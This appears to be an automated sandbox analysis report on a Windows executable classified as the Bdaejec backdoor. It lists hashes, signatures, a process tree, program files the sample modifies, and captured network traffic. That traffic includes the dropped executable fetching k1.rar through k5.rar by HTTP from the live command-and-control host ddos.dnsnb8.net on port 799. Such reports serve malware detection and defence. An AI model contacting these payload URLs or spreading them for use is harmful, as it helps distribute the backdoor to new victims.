Analysis
-
max time kernel
101s -
max time network
101s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
05/02/2025, 13:17 UTC
Static task
static1
Behavioral task
behavioral1
Sample
eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2N.exe
Resource
win7-20241010-en
General
-
Target
eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2N.exe
-
Size
45KB
-
MD5
f77eade8e037a9aa137b7c35b4640da0
-
SHA1
1bb8cf50d814682890d5d0f6cb286512f12cda45
-
SHA256
eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2
-
SHA512
4934732c6f9f248f620ccdbf32cebc00bd5f59fbb4d3349c4cd221153a0160bdd75f3b359c5b04e559812be7a15701106cf72e816210b66cdff8085dfa30b236
-
SSDEEP
768:X7Z2VKKlnDRMyL+TDx8VlF67RvsypS6HkPA0d/1oQGPL4vzZq2o9W7GsxBbPr:V27bMyL6tMlA7R0ypSU0Z1jGCq2iW7z
Malware Config
Extracted
bdaejec
ddos.dnsnb8.net
Signatures
-
Bdaejec family
-
Detects Bdaejec Backdoor. 1 IoCs
Bdaejec is backdoor written in C++.
resource yara_rule behavioral2/memory/4756-49-0x00000000002A0000-0x00000000002A9000-memory.dmp family_bdaejec_backdoor -
resource yara_rule behavioral2/files/0x000c000000023afb-3.dat aspack_v212_v242 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation iNbVmR.exe -
Executes dropped EXE 1 IoCs
pid Process 4756 iNbVmR.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\bin\jabswitch.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\kinit.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\jabswitch.exe iNbVmR.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe iNbVmR.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe iNbVmR.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe iNbVmR.exe File opened for modification C:\Program Files\Windows Mail\wab.exe iNbVmR.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Microsoft.Msn.Weather.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javah.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\javaw.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\jjs.exe iNbVmR.exe File opened for modification C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate64.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\javaws.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\rmid.exe iNbVmR.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\VPREVIEW.EXE iNbVmR.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe iNbVmR.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\filecompare.exe iNbVmR.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\chrome_pwa_launcher.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\servertool.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\javacpl.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\ktab.exe iNbVmR.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\SmartTagInstall.exe iNbVmR.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeBridge\SkypeBridge.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javac.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\klist.exe iNbVmR.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE iNbVmR.exe File opened for modification C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe iNbVmR.exe File opened for modification C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\123.0.6312.123\chrome_installer.exe iNbVmR.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\msotd.exe iNbVmR.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe iNbVmR.exe File opened for modification C:\Program Files\Mozilla Firefox\private_browsing.exe iNbVmR.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe iNbVmR.exe File opened for modification C:\Program Files\Windows Photo Viewer\ImagingDevices.exe iNbVmR.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\XboxApp.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javaw.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\keytool.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\servertool.exe iNbVmR.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE iNbVmR.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\rmid.exe iNbVmR.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\onenoteim.exe iNbVmR.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdate.exe iNbVmR.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jhat.exe iNbVmR.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\extcheck.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javacpl.exe iNbVmR.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe iNbVmR.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe iNbVmR.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\codecpacks.heif.exe iNbVmR.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe iNbVmR.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Microsoft.WebMediaExtensions.exe iNbVmR.exe File opened for modification C:\Program Files (x86)\Windows Mail\wabmig.exe iNbVmR.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javadoc.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe iNbVmR.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe iNbVmR.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\helper.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jdb.exe iNbVmR.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSQRY32.EXE iNbVmR.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE iNbVmR.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe iNbVmR.exe File opened for modification C:\Program Files\7-Zip\7z.exe iNbVmR.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\servertool.exe iNbVmR.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2N.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iNbVmR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3788 wrote to memory of 4756 3788 eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2N.exe 84 PID 3788 wrote to memory of 4756 3788 eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2N.exe 84 PID 3788 wrote to memory of 4756 3788 eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2N.exe 84 PID 4756 wrote to memory of 2120 4756 iNbVmR.exe 88 PID 4756 wrote to memory of 2120 4756 iNbVmR.exe 88 PID 4756 wrote to memory of 2120 4756 iNbVmR.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2N.exe"C:\Users\Admin\AppData\Local\Temp\eded002f7cb6a0735d4680c3f86a491c5a3f4b91920a3846e1fee88c2c8863f2N.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Users\Admin\AppData\Local\Temp\iNbVmR.exeC:\Users\Admin\AppData\Local\Temp\iNbVmR.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6f4e4482.bat" "3⤵
- System Location Discovery: System Language Discovery
PID:2120
-
-
Network
-
Remote address:8.8.8.8:53Requestddos.dnsnb8.netIN AResponseddos.dnsnb8.netIN A44.221.84.105
-
Remote address:44.221.84.105:799RequestGET /cj//k1.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address:44.221.84.105:799RequestGET /cj//k2.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address:44.221.84.105:799RequestGET /cj//k2.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address:44.221.84.105:799RequestGET /cj//k3.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request105.84.221.44.in-addr.arpaIN PTRResponse105.84.221.44.in-addr.arpaIN PTRec2-44-221-84-105 compute-1 amazonawscom
-
Remote address:8.8.8.8:53Request131.160.190.20.in-addr.arpaIN PTRResponse
-
Remote address:44.221.84.105:799RequestGET /cj//k3.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address:8.8.8.8:53Requestg.bing.comIN AResponseg.bing.comIN CNAMEg-bing-com.ax-0001.ax-msedge.netg-bing-com.ax-0001.ax-msedge.netIN CNAMEax-0001.ax-msedge.netax-0001.ax-msedge.netIN A150.171.27.10ax-0001.ax-msedge.netIN A150.171.28.10
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=Remote address:150.171.27.10:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=122FB1D16DA265F51C59A45B6C1964F9; domain=.bing.com; expires=Mon, 02-Mar-2026 13:17:29 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 1DD38138A9B44A26839D255E959F46E8 Ref B: LON04EDGE0917 Ref C: 2025-02-05T13:17:29Z
date: Wed, 05 Feb 2025 13:17:28 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=Remote address:150.171.27.10:443RequestGET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=122FB1D16DA265F51C59A45B6C1964F9
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=bkkDM99nhmsOA968bAeDDSW8IgC2iD9E7wZHm27KXww; domain=.bing.com; expires=Mon, 02-Mar-2026 13:17:29 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 072B54C4B83E4075A8F4D244861102A7 Ref B: LON04EDGE0917 Ref C: 2025-02-05T13:17:29Z
date: Wed, 05 Feb 2025 13:17:28 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=Remote address:150.171.27.10:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=122FB1D16DA265F51C59A45B6C1964F9; MSPTC=bkkDM99nhmsOA968bAeDDSW8IgC2iD9E7wZHm27KXww
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 5A22266786D54735944ADFC986977D0E Ref B: LON04EDGE0917 Ref C: 2025-02-05T13:17:29Z
date: Wed, 05 Feb 2025 13:17:28 GMT
-
Remote address:44.221.84.105:799RequestGET /cj//k4.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address:44.221.84.105:799RequestGET /cj//k5.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address:8.8.8.8:53Request10.27.171.150.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.214.232.199.in-addr.arpaIN PTRResponse
-
Remote address:44.221.84.105:799RequestGET /cj//k5.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address:44.221.84.105:799RequestGET /cj//k5.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
-
Remote address:8.8.8.8:53Request56.163.245.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request171.39.242.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request55.36.223.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request19.229.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requesttse1.mm.bing.netIN AResponsetse1.mm.bing.netIN CNAMEmm-mm.bing.net.trafficmanager.netmm-mm.bing.net.trafficmanager.netIN CNAMEax-0001.ax-msedge.netax-0001.ax-msedge.netIN A150.171.27.10ax-0001.ax-msedge.netIN A150.171.28.10
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239400980054_1OGDK147FWK2B0UFH&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90Remote address:150.171.27.10:443RequestGET /th?id=OADD2.10239400980054_1OGDK147FWK2B0UFH&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 348777
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FFB1CA2708984238BA9C4897CADB1564 Ref B: LON04EDGE1118 Ref C: 2025-02-05T13:19:07Z
date: Wed, 05 Feb 2025 13:19:07 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239354941506_108VQJ4IWCAUQROCX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90Remote address:150.171.27.10:443RequestGET /th?id=OADD2.10239354941506_108VQJ4IWCAUQROCX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 533476
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E2A699F136DE48828BFAA017EEA262BC Ref B: LON04EDGE1118 Ref C: 2025-02-05T13:19:07Z
date: Wed, 05 Feb 2025 13:19:07 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239354941507_1IKXGMO7QA3RV5DUV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90Remote address:150.171.27.10:443RequestGET /th?id=OADD2.10239354941507_1IKXGMO7QA3RV5DUV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 532928
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FB99CA9E894E4539ABB7483856AFC659 Ref B: LON04EDGE1118 Ref C: 2025-02-05T13:19:07Z
date: Wed, 05 Feb 2025 13:19:07 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239400980050_1PW8OVEXHJX99CZMV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90Remote address:150.171.27.10:443RequestGET /th?id=OADD2.10239400980050_1PW8OVEXHJX99CZMV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 289384
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: ABA8FC40AF0448AFB27B9F2E03B95403 Ref B: LON04EDGE1118 Ref C: 2025-02-05T13:19:07Z
date: Wed, 05 Feb 2025 13:19:07 GMT
-
564 B 296 B 6 7
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k1.rar -
472 B 216 B 4 5
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k2.rar -
564 B 296 B 6 7
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k2.rar -
518 B 256 B 5 6
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k3.rar -
564 B 296 B 6 7
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k3.rar -
150.171.27.10:443https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=tls, http22.0kB 9.4kB 22 19
HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c2b314b8e808407c91e0827ca84a966a&localId=w:EAE6EB93-53CA-4E93-08B1-7BC6348946BC&deviceId=6966578605829226&anid=HTTP Response
204 -
564 B 296 B 6 7
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k4.rar -
472 B 216 B 4 5
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k5.rar -
472 B 216 B 4 5
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k5.rar -
564 B 296 B 6 7
HTTP Request
GET http://ddos.dnsnb8.net:799/cj//k5.rar -
1.2kB 6.9kB 15 13
-
1.2kB 6.9kB 15 13
-
1.2kB 6.9kB 15 13
-
150.171.27.10:443https://tse1.mm.bing.net/th?id=OADD2.10239400980050_1PW8OVEXHJX99CZMV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90tls, http261.4kB 1.8MB 1288 1285
HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239400980054_1OGDK147FWK2B0UFH&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239354941506_108VQJ4IWCAUQROCX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239354941507_1IKXGMO7QA3RV5DUV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239400980050_1PW8OVEXHJX99CZMV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
